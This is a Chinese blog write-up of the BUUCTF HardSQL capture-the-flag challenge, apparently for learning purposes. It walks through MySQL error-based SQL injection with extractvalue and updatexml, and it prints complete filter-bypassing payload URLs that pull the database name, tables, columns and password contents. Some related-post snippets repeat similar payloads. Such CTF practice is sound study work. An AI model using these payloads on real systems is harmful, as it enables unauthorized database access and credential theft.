[极客大挑战 2019]HardSQL 对mysql的报错注入

最新推荐文章于 2021-11-25 20:45:36 发布
最新推荐文章于 2021-11-25 20:45:36 发布
阅读量157 收藏
点赞数
分类专栏: Web刷题记录 文章标签: php mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/109183567
版权

[极客大挑战 2019]BabySQL

前言

文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途!

了解报错注入可以去这个师傅的博客看看
链接:https://www.cnblogs.com/richardlee97/p/10617115.html

一、收集信息

登录界面是这样

在这里插入图片描述
Fuzz一下发现union过滤了,双写没用的
但还有extractvalue和updatexm没给过滤,多半是报错注入了

二、payload

check.php?username=a'or(extractvalue(1,concat(0x7e,database(),0x7e)))%23&password=a

在这里插入图片描述
这句话我也不是很明白,但是它就是那么利用的,希望有大佬能够教我弄懂:)
稍微更改一下中间的select语句来利用

check.php?
username=a'or(extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like("geek")),0x7e)))%23
&password=a

在这里插入图片描述
出表后出列

check.php?
username=a'or(extractvalue(1,concat(0x7e(select(group_concat(column_name))from(information_schema.columns)where(table_name)like("H4rDsq1")),0x7e)))%23
&password=a

在这里插入图片描述
然后直接读读看

check.php?
username=a'or(extractvalue(1,concat(0x7e,(select(password)from(H4rDsq1)),0x7e)))%23
&password=a

在这里插入图片描述
搞不懂为什么只有一部分,可能长度限制了吧
看了王叹之师傅的博客发现评论说updatexml和extractvalue可能都只返回32个字符,所以才显示不全
当然也参考了一下解决方法!

可以用reverse来反转读

check.php?
username=a'or(extractvalue(1,concat(0x7e,(select(reverse(password))from(H4rDsq1)),0x7e)))%23
&password=a

在这里插入图片描述
虽然能拼接,但是很难看

也可以拿right()函数来读到剩下的

check.php?
username=a'or(extractvalue(1,concat(0x7e,(select(right(password,30))from(H4rDsq1)),0x7e)))%23
&password=a

在这里插入图片描述
这就好看多了!

总结

还是缺乏对注入类型的判断经验,写这篇博客也是边写边做
总的来说还是收获颇多!
感谢BUUCTF提供的平台练习!

小 白 萝 卜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
极客学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 极客学院JAVA视频教程 新版 7大部分
[极客挑战 2019]HardSQL
o3Ev的博客
04-16 6318
[极客挑战 2019]HardSQL (主要记录一下自己做题的思路) 题目: 打开环境,得到: 废话不多说,都说了是hardsql了,直接fuzz测试一下 可以看到有很多还是没被过滤的,现在就要自己再手动测试一下常见的一些方式了,我这里说下我做这题的思路: 先试着输入了admin' #,返回了: 说明空格确实被过滤,接着就要想办法绕过空格了,先试着用了下/**/来绕过空格,发现同样被过滤了 现在只有用()括号来绕过空格了,这里简单讲下空格绕过的原理: 括号是来包含子查询的,任何可以计算出结果的语
34 Dom id选择器
wwwshengbo的博客
02-17 265
<!DOCTYPE html> <html> <head> <meta charset="utf-8"/> <title> </title> </head> <body> <p id="p1"> DOM 选择器
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
此文档描述的是2019年三诺集团四周年庆典的一项独特活动——“极客摇滚跑”。这是一场集科技、运动和音乐于一体的大型庆典,旨在庆祝三诺集团的周年纪念,并促进北海市高新产业园及其相关企业的交流与合作。活动的...
天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
最新发布
01-28
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,...天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
GFG-:极客极客30天挑战
02-17
极客30天挑战2021年1月 30天练​​习问题的Python解决方案: 与同学一起翻阅怪胎。(Array); 第N个自然数; 不能表示为Sum的最小正整数; 从抽屉里拿出“ k”双袜子的最小采摘次数; 螺旋矩阵奇克兰的硬币; 有效...
CTF-Web-[极客挑战 2019]HardSQL
归子莫的博客
05-03 2940
CTF-Web-[极客挑战 2019]HardSQL 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Web类,[极客挑战 2019]HardSQL 打开题目的实例 思路 SQl的题目,首先试一试...
极客挑战2019 HardSQL
Tajang的大千世界
04-10 166
打开靶机 先试一下万能密码1' or 1=1# 看起来过滤了一些东西,手动测试一下,发现过滤了and、=、空格、union等多个注入关键词(别问我为什么不fuzz,因为我fuzz结果跟手动测试结果有出入,明明过滤的,fuzz没测试出来) 试一下报错注入,然后将语句中被过滤的关键词改写就行。空格用()代替,=用like代替 查版本和数据库 原语句: admin' or updatexml(1,concat((select concat('~',version(),'~',database()))),1)#
极客挑战 Hardsql
weixin_45751765的博客
08-30 579
0x00 前言 a.sql注入fuzzing 碰到sql注入题时,为尽快确认过滤列,可做一个fuzzing_test 注意一次发太多包会429,适当调节引擎 可以看到736都是被过滤的
BUU-web HardSQL
qq_46635165的博客
10-18 311
知识点: sql显错注入 显错注入:简单来说,就是通过某些函数回显的报错信息来获取我们想要的数据; 例如: mysql的 updatexml() 函数:由于 select user() 查询出的数据不符合 XPATH 语法,从而报错,顺便将 select user() 这条语句执行,并将结果以报错的方式显示出来; 解题: 打开解题网址,账户密码登录框,尝试单引号报错,报错成功; 单引号闭合,并 # 号注释:闭合成功; 接下来尝试 order by 字段猜测,发现 被过滤:并且过滤了 union ,a.
极客挑战 2019]HardSQL
shannidawang的博客
07-29 107
确实是一整个不知所措了 尝试了一下双写 不行 那就基本上是报错注入了 使用extractvalue和updatexml进行报错注入 extractvalue() extractvalue() :对XML文档进行查询的函数 语法:extractvalue(目标xml文档,xml路径) 第一个参数 : 第一个参数可以传入目标xml文档 第二个参数: xml中的位置是可操作的地方,xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报错,并且会返回我们写入的非法格式.
(一)[极客挑战 2019]HardSQL
qq_53856457的博客
11-25 2967
进入后是sql注入页面,过滤了一些字符,先进行fuzz测试。 发现过滤了union,双写也无法绕过,所以不能使用常规的方法进行注入。但发现没有过滤extractvalue和updatexml。 也过滤了空格,使用括号绕过。 1.首先,注数据库名称 username=1'or(updatexml(1,concat(0x7e,database(),0x7e),1))%23&password=1 当前数据库名:geek 2.然后得表名(过滤=,使用like代替) username=admin'or
[BUUCTF刷题]HardSQL
weixin_43952190的博客
07-03 2024
HardSQL 进入后是sql注入页面,过滤了一些字符,先进行fuzz测试。 发现过滤了union,双写也无法绕过,所以不能使用常规的方法进行注入。但发现没有过滤extractvalue和updatexml。 也过滤了空格,使用括号绕过。 首先,注数据库名称 username=admin'or(updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1))%23&password=1 然后得到表名(过滤=,使用like) userna
极客挑战 2019]EasySQL
09-03
EasySQL极客挑战 2019 中的一个题目,它是一个简单的 SQL 数据库查询题目。可以通过编写 SQL 查询语句来实现对给定的数据库表进行数据查询和分析。 在 EasySQL 中,你将面对一个包含不同表的数据库,你需要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值